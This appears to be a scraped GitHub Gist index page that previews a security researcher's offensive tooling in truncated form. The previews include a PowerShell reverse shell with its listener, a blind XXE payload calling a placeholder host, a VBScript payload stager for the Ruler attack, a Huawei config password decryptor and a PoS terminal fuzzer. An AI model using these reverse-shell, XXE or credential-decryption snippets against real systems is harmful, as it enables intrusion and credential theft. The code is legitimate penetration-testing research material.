Skip to content

Instantly share code, notes, and snippets.

staaldraad /
Created Mar 11, 2015
Decrypt Huawei router/firewall passwords. Huawei stores passwords using DES encryption when the crypted option is enabled.
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (
Version: 1.0 (12/01/2014)
from Crypto.Cipher import DES
staaldraad / Command.vbs
Last active Aug 3, 2022
Using VBSMeter with Ruler
View Command.vbs
Call X()
End Function
Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"
Function Base64ToStream(b)
Dim enc, length, ba, transform, ms
Set enc = CreateObject("System.Text.ASCIIEncoding")
length = enc.GetByteCount_2(b)
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
staaldraad /
Last active Jul 29, 2022
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
staaldraad / oauthServer.go
Last active Jul 23, 2022
A mini OAuth server for Azure
View oauthServer.go
package main
import (
staaldraad /
Last active Jun 30, 2022
Fuzz Verifone PoS terminals through exposed port
Script for fuzzing verifone terminal/pos devices. This is a bad reverse-engineer and implementation of the official protocol:
Should work fine. Official docs were only found after the initial implementation. Not fully tested with CRC-16 checksum correctly implemented.
Version: 1.0
staaldraad / webdavserv.go
Last active Jun 25, 2022
A small webdav server in go
View webdavserv.go
package main
import (
staaldraad / mini-reverse.ps1
Created Oct 3, 2016
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
staaldraad /
Last active Apr 30, 2022
Quick script to generate different formats for a given IP address.
#!/usr/bin/env python
import sys
if len(sys.argv) < 2:
print "Enter IP address as first argument: python %s"%sys.argv[0]
ip = sys.argv[1]
ips = ip.split('.')
iph = '0x{:02X}.0x{:02X}.0x{:02X}.0x{:02X}'.format(*map(int, ips))
staaldraad / mini-reverse-listener.ps1
Created Oct 3, 2016
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 413);
if($socket -eq $null){
exit 1
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"